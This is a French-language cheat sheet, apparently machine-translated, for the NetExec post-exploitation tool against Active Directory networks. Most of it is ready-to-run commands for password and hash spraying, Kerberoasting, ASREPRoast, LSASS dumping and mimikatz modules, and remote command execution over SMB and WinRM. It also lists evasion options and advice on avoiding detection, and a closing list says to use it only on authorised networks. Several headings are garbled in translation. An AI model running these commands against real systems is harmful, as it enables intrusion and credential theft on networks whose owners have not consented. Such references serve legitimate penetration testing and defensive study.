Exec net
Copier toutes les commandes
Générer PDF
NetExec (anciennement CrackMapExec) est un outil post-exploitation qui permet d'automatiser l'évaluation de la sécurité des grands réseaux Active Directory grâce à l'abus de protocole réseau et aux attaques de justificatifs.
Installation et configuration
| Command |
Description |
pip3 install netexec |
Install NetExec via pip |
pipx install netexec |
Install with pipx (recommended) |
git clone https://github.com/Pennyw0rth/NetExec.git |
Clone from GitHub |
cd NetExec && pip3 install . |
Install from source |
netexec --version |
Check installed version |
netexec --help |
Display help information |
Utilisation de base
| Command |
Description |
netexec smb 192.168.1.0/24 |
Scan SMB on subnet |
netexec smb 192.168.1.100 -u username -p password |
Authenticate with credentials |
netexec smb 192.168.1.100 -u username -H ntlmhash |
Authenticate with NTLM hash |
netexec smb 192.168.1.100 -u '' -p '' |
Anonymous authentication |
netexec smb targets.txt -u username -p password |
Use target file |
Appui au protocole
Protocole SMB
| Command |
Description |
netexec smb 192.168.1.100 |
Basic SMB enumeration |
netexec smb 192.168.1.100 --shares |
Enumerate shares |
netexec smb 192.168.1.100 --users |
Enumerate users |
netexec smb 192.168.1.100 --groups |
Enumerate groups |
netexec smb 192.168.1.100 --local-groups |
Enumerate local groups |
netexec smb 192.168.1.100 --sessions |
Enumerate sessions |
netexec smb 192.168.1.100 --disks |
Enumerate disks |
Protocole WinRM
| Command |
Description |
netexec winrm 192.168.1.100 -u username -p password |
WinRM authentication |
netexec winrm 192.168.1.100 -u username -p password -x "whoami" |
Execute command |
netexec winrm 192.168.1.100 -u username -p password -X powershell.ps1 |
Execute PowerShell script |
Protocole LDAP
| Command |
Description |
netexec ldap 192.168.1.100 -u username -p password |
LDAP authentication |
netexec ldap 192.168.1.100 -u username -p password --users |
Enumerate LDAP users |
netexec ldap 192.168.1.100 -u username -p password --groups |
Enumerate LDAP groups |
netexec ldap 192.168.1.100 -u username -p password --computers |
Enumerate computers |
Protocole MSSQL
| Command |
Description |
netexec mssql 192.168.1.100 -u username -p password |
MSSQL authentication |
netexec mssql 192.168.1.100 -u username -p password -q "SELECT @@version" |
Execute SQL query |
netexec mssql 192.168.1.100 -u username -p password --local-auth |
Local authentication |
Protocole SSH
| Command |
Description |
netexec ssh 192.168.1.100 -u username -p password |
SSH authentication |
netexec ssh 192.168.1.100 -u username -k id_rsa |
SSH key authentication |
netexec ssh 192.168.1.100 -u username -p password -x "id" |
Execute command |
Méthodes d'authentification
Authentification du mot de passe
| Command |
Description |
netexec smb 192.168.1.100 -u username -p password |
Single credential |
netexec smb 192.168.1.100 -u users.txt -p passwords.txt |
Credential lists |
netexec smb 192.168.1.100 -u username -p passwords.txt |
Password spraying |
netexec smb 192.168.1.100 -u users.txt -p password |
User enumeration |
Authentification en Hash
| Command |
Description |
netexec smb 192.168.1.100 -u username -H ntlmhash |
NTLM hash |
netexec smb 192.168.1.100 -u username -H lmhash:ntlmhash |
LM:NTLM hash |
netexec smb 192.168.1.100 -u users.txt -H hashes.txt |
Hash lists |
Authentification Kerberos
| Command |
Description |
netexec smb 192.168.1.100 -u username -p password -k |
Kerberos authentication |
netexec smb 192.168.1.100 -u username --use-kcache |
Use Kerberos cache |
netexec smb 192.168.1.100 -u username -p password --kerberos |
Force Kerberos |
Énumération
Énumération des parts
| Command |
Description |
netexec smb 192.168.1.100 --shares |
List shares |
netexec smb 192.168.1.100 --shares -u username -p password |
Authenticated share listing |
netexec smb 192.168.1.100 --spider SHARE |
Spider share contents |
netexec smb 192.168.1.100 --spider SHARE --pattern "*.txt" |
Search for files |
Énumération des utilisateurs
| Command |
Description |
netexec smb 192.168.1.100 --users |
Enumerate users |
netexec smb 192.168.1.100 --rid-brute |
RID bruteforce |
netexec smb 192.168.1.100 --users --rid-brute 1000-2000 |
RID range |
Énumération des groupes
| Command |
Description |
netexec smb 192.168.1.100 --groups |
Enumerate groups |
netexec smb 192.168.1.100 --local-groups |
Local groups |
netexec smb 192.168.1.100 --groups "Domain Admins" |
Specific group |
Énumération par ordinateur
| Command |
Description |
netexec ldap 192.168.1.100 --computers |
Enumerate computers |
netexec smb 192.168.1.100 --computers |
SMB computer enumeration |
Exécution des commandes
Exécution de la commande SMB
| Command |
Description |
netexec smb 192.168.1.100 -u username -p password -x "whoami" |
Execute command |
netexec smb 192.168.1.100 -u username -p password -X script.ps1 |
Execute PowerShell script |
netexec smb 192.168.1.100 -u username -p password --exec-method wmiexec |
Use WMI execution |
netexec smb 192.168.1.100 -u username -p password --exec-method smbexec |
Use SMB execution |
Exécution de la commande WinRM
| Command |
Description |
netexec winrm 192.168.1.100 -u username -p password -x "Get-Process" |
PowerShell command |
netexec winrm 192.168.1.100 -u username -p password -X script.ps1 |
Execute script |
Modules
Modules intégrés
| Command |
Description |
netexec smb 192.168.1.100 -M spider_plus |
Enhanced spidering |
netexec smb 192.168.1.100 -M enum_avproducts |
Enumerate AV products |
netexec smb 192.168.1.100 -M gpp_password |
Group Policy Preferences |
netexec smb 192.168.1.100 -M lsassy |
LSASS dumping |
netexec smb 192.168.1.100 -M mimikatz |
Mimikatz execution |
Options du module
| Command |
Description |
netexec smb 192.168.1.100 -M spider_plus -o READ_ONLY=false |
Module options |
netexec smb 192.168.1.100 -M lsassy -o BLOODHOUND=true |
Bloodhound output |
Opérations de bases de données
| Command |
Description |
netexec smb 192.168.1.100 --users --export users.csv |
Export to CSV |
netexec db |
Database management |
netexec db --workspace default |
Set workspace |
netexec db --clear-database |
Clear database |
Caractéristiques avancées
Stuffing à titre d'élément constitutif
| Command |
Description |
netexec smb targets.txt -u users.txt -p passwords.txt --continue-on-success |
Continue on success |
netexec smb targets.txt -u users.txt -p passwords.txt --fail-limit 3 |
Fail limit |
Politique sur le mot de passe
| Command |
Description |
netexec smb 192.168.1.100 --pass-pol |
Get password policy |
netexec ldap 192.168.1.100 --pass-pol |
LDAP password policy |
Intégration de Bloodhound
| Command |
Description |
netexec ldap 192.168.1.100 -u username -p password --bloodhound |
Collect Bloodhound data |
netexec ldap 192.168.1.100 -u username -p password --bloodhound -c All |
All collections |
ATREPRoast
| Command |
Description |
netexec ldap 192.168.1.100 -u users.txt --asreproast asrep.txt |
ASREPRoast attack |
netexec ldap 192.168.1.100 -u username -p password --asreproast asrep.txt |
Authenticated ASREPRoast |
Kerberoasting
| Command |
Description |
netexec ldap 192.168.1.100 -u username -p password --kerberoasting kerb.txt |
Kerberoasting attack |
Production et exploitation
| Command |
Description |
netexec smb 192.168.1.100 --verbose |
Verbose output |
netexec smb 192.168.1.100 --debug |
Debug output |
netexec smb 192.168.1.100 -o output.txt |
Save output to file |
netexec smb 192.168.1.100 --log logs/ |
Log directory |
Configuration
Fichier de configuration (~/.nxc/nxc.conf)
[nxc]
workspace = default
last_used_db = ~/.nxc/workspaces/default/nxc.db
pwn3d_label = Pwn3d!
audit_mode = False
reveal_chars_of_pwd = 0
Options propres à chaque protocole
| Command |
Description |
netexec smb 192.168.1.100 --port 445 |
Custom port |
netexec smb 192.168.1.100 --timeout 5 |
Connection timeout |
netexec smb 192.168.1.100 --threads 100 |
Thread count |
Techniques d'évacuation
| Command |
Description |
netexec smb 192.168.1.100 --jitter 1-5 |
Random delay |
netexec smb 192.168.1.100 --delay 2 |
Fixed delay |
netexec smb 192.168.1.100 --obfs |
Obfuscation |
Scénarios d'attaque communs
Énumération des domaines
# Basic domain enumeration
netexec smb dc.domain.com -u username -p password --users --groups --computers
# Share enumeration
netexec smb 192.168.1.0/24 -u username -p password --shares
# Password policy
netexec smb dc.domain.com -u username -p password --pass-pol
```_
### Attaques crédibles
```bash
# Password spraying
netexec smb 192.168.1.0/24 -u users.txt -p 'Password123!' --continue-on-success
# Hash spraying
netexec smb 192.168.1.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76
# ASREPRoast
netexec ldap dc.domain.com -u users.txt --asreproast asrep_hashes.txt
```_
### Après exploitation
```bash
# Command execution
netexec smb 192.168.1.100 -u username -p password -x "net user /domain"
# LSASS dumping
netexec smb 192.168.1.100 -u username -p password -M lsassy
# Bloodhound collection
netexec ldap dc.domain.com -u username -p password --bloodhound -c All
Intégration avec d'autres outils
Intégration de l'empacket
| Command |
Description |
netexec smb 192.168.1.100 -u username -p password --exec-method wmiexec |
Use Impacket WMI |
netexec smb 192.168.1.100 -u username -p password --exec-method smbexec |
Use Impacket SMB |
Migration de Crackmapexec
| Command |
Description |
netexec --convert-cme-db |
Convert CME database |
alias cme='netexec' |
Create alias for compatibility |
Dépannage
| Command |
Description |
netexec --help |
General help |
netexec smb --help |
Protocol-specific help |
netexec -v |
Version information |
netexec --debug smb 192.168.1.100 |
Debug mode |
Meilleures pratiques
- Utiliser l'authentification avant le dénombrement si possible
- Mettre en place des délais appropriés pour éviter la détection
- Utiliser des espaces de travail pour organiser différents engagements
- Résultats des exportations pour analyse plus approfondie
- Combiner avec d'autres outils pour une évaluation complète
- Surveiller les réactions défensives
- Utiliser le nombre de fils approprié pour éviter les cibles écrasantes
- Mettre en place un système d'enregistrement approprié pour la documentation
- Valider les références avant les attaques à grande échelle
- Utiliser des techniques d'obfuscation si nécessaire
Considérations en matière de sécurité
- Utilisation uniquement sur les réseaux autorisés
- Mettre en place des contrôles d'accès appropriés
- Moniteur de détection par des outils de sécurité
- Utiliser les principes de moindre privilège
- Documenter toutes les activités de conformité
- Coordonner avec l'équipe bleue le cas échéant
- Mettre en œuvre des procédures de nettoyage appropriées
- Stocker les identifiants en toute sécurité
- Utiliser la communication cryptée si possible
- Mises à jour régulières pour maintenir l'efficacité